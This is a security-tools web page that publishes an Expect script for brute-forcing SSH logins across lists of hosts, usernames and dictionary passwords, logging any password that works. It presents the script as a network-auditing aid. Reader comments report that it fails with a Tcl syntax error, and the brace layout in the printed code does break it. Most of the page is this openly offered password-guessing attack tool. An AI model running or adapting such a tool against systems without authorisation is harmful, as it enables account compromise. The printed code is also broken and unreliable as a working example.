SecuriTeam - SSH Brute Forcer

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Credit:
The information has been provided by James Shanahan and Erin Palmer.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

This is an expect script that will allow you to specify a host file, user file, and a dictionary. Extremely useful for auditing large networks where you can't manually log into every machine or don't feel like re-running something on every host.

Tool:
#!/usr/bin/expect -f
#
# Written by James Shanahan (jshanahan@comcastpc.com)
# and Erin Palmer(epalmer@comcastpc.com)
# ssh brute forcer
# This will allow you to specify hosts, password lists, and a user
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!

set timeout 5
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]

if {[llength $argv] != 3} {
   puts stderr "Usage: $argv0 <dictionary-file> <hosts-file> <user-file>\n"
   exit }

set tryHost [open $file r]
set tryPass [open $dictionary r]
set tryUser [open $user r]

set passwords [read $tryPass]
set hosts [read $tryHost]
set login [read $tryUser]

foreach username $login
{
foreach passwd $passwords
{
  foreach ip $hosts
  {
   spawn ssh $username@$ip
   expect ":"
   send "$passwd\n"
   set logFile [open $ip.log a]
   expect "L"
   {
    puts $logFile "password for $username@$ip is $passwd\n"
    close $logFile
   }
   set id [exp_pid]
   exec kill -INT $id
  }
}
}

Subject:		Date:	19 Nov. 2008
From:	qmartygmail.com
wrong # args: should be "e;foreach varList list ?varList list ...? command"e; while executing "e;foreach username $login"e;

Subject:	bug	Date:	12 Dec. 2008
From:	me
wrong # args: should be "e;foreach varList list ?varList list ...? command"e; while executing "e;foreach username $login"e; (file "e;./test"e; line 28)

Subject:	doesnt work	Date:	18 Mar. 2009
From:	mido06
wrong # args: should be "e;foreach varList list ?varList list ...? command"e; while executing "e;foreach username $login "e; (file "e;./ssh_bf.exp"e; line 28)

Subject:	no good, wont run.	Date:	1 Nov. 2009
From:	freakwent
shame. try http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196 if you want to.

	Netifera - Modular Open Source Platform for Security Tools
	WarVOX - Tools for Exploring, Classifying, and Auditing Telephone Systems
	Webshag - Web Server Audit Tool
	Browser Fuzzer
	FSpy - Linux Filesystem Activity Monitoring
	telnetrecon - Telnet Recon
	Zerowine Sandbox
	JPEG Fuzzer
	VNC Server Fuzzer
	RSH Fuzzer
	Exomind
	Browser Rider
	MP3 TAG Fuzzer
	PDFuzzer - PDF File Standard Fuzzer
	Miranda - UPNP Administration and Audit Tool